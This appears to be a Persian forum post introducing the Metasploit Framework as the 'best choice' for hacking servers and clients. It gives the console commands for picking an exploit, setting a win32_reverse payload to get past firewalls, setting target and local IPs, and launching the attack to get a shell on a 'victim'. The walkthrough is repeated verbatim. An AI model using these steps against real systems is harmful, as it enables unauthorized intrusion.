Metasploit Framework
صفحه 1 از 1
Metasploit Framework
Metasploit Framework مجموعه ای از باگ های سیستم عامل ها و برنامه های آن ها می باشد که به در یافت Shell و دسترسی کامل به سیستم هدف ختم میشود .در حال حاضر این مجموعه دارای 81 باگ می باشد که بسیاری از آن ها هنوز patch نشده وبرای هک کردن سرور و یا کلاینت ها بهترین انتخاب می باشد .این برنامه گزینه ی update داشته و خودش را بوسیله آن به روز می کنید و شما را از پیدا کردن bug های جدید و compile آن ها بی نیاز میکند .این برنامه حالت های payload مختلفی دارد که کارائی فراوانی دارد برای شروع پس از دریافت آن از اینجا و updtae آن باید در داخل برنامه
تایپ کنید show exploits که با این دستور لیست باگ ها نمایش می یابد و شما میتوانید با دستور use exploit name یکی از آن ها را اجرا کنید
show PAYLOADS این دستور لیست حالت های اتصال را نمایش می دهد . مثلآ و قتی در سیستم طرف firewall وجود دارد با انتخاب payload ه win32_reverse با کمک این دستور set PAYLOAD win32_reverse به برنامه می گوئید که در گرفتن shell سیستم ارتباط از طرف سیستم قربانی با شما باشد تا بتواند firewall را دور بزند (چون او به شما وصل شده و فایروال تنها با دریافت مشکل دارد)
set RHOST 66.66.78.44 با این دستور به برنامه می گویید که ip remote host کسی که می خواهید از آن shell بگیرید 66.66.78.44 می باشد
set LHOST 65.76.54.77 با کمک این دستور به برنامه می گوئید که ip شما 65.76.54.77 می باشد . این گزینه در حالت payload ه win32_reverse استفاده می شود تا سیستم قربانی به این ip وصل شود
show TARGETS لیست سیستم های آسیب پذیر در این باگ را نمایش میدهد با عدد خاص رویروی آن مثلآ All Windows 0 شما با استفاده از دستور set TARGET 0 به برنامه میگوئید که All Windows می باشد
show OPTIONS لیست متغیر های مقدار پذیر مانند RHOST و ... را با مقدار داده شده توسط شما نشان می دهد که برای کنترل درستی کار مفید می باشد
exploit این دستور با داده های ورودی شما شروع به shell گرفتن می کند
starting bind handler
get connection from
تایپ کنید show exploits که با این دستور لیست باگ ها نمایش می یابد و شما میتوانید با دستور use exploit name یکی از آن ها را اجرا کنید
show PAYLOADS این دستور لیست حالت های اتصال را نمایش می دهد . مثلآ و قتی در سیستم طرف firewall وجود دارد با انتخاب payload ه win32_reverse با کمک این دستور set PAYLOAD win32_reverse به برنامه می گوئید که در گرفتن shell سیستم ارتباط از طرف سیستم قربانی با شما باشد تا بتواند firewall را دور بزند (چون او به شما وصل شده و فایروال تنها با دریافت مشکل دارد)
set RHOST 66.66.78.44 با این دستور به برنامه می گویید که ip remote host کسی که می خواهید از آن shell بگیرید 66.66.78.44 می باشد
set LHOST 65.76.54.77 با کمک این دستور به برنامه می گوئید که ip شما 65.76.54.77 می باشد . این گزینه در حالت payload ه win32_reverse استفاده می شود تا سیستم قربانی به این ip وصل شود
show TARGETS لیست سیستم های آسیب پذیر در این باگ را نمایش میدهد با عدد خاص رویروی آن مثلآ All Windows 0 شما با استفاده از دستور set TARGET 0 به برنامه میگوئید که All Windows می باشد
show OPTIONS لیست متغیر های مقدار پذیر مانند RHOST و ... را با مقدار داده شده توسط شما نشان می دهد که برای کنترل درستی کار مفید می باشد
exploit این دستور با داده های ورودی شما شروع به shell گرفتن می کند
starting bind handler
get connection from
صفحه 1 از 1
صلاحيات هذا المنتدى:
شما نمي توانيد در اين بخش به موضوعها پاسخ دهيد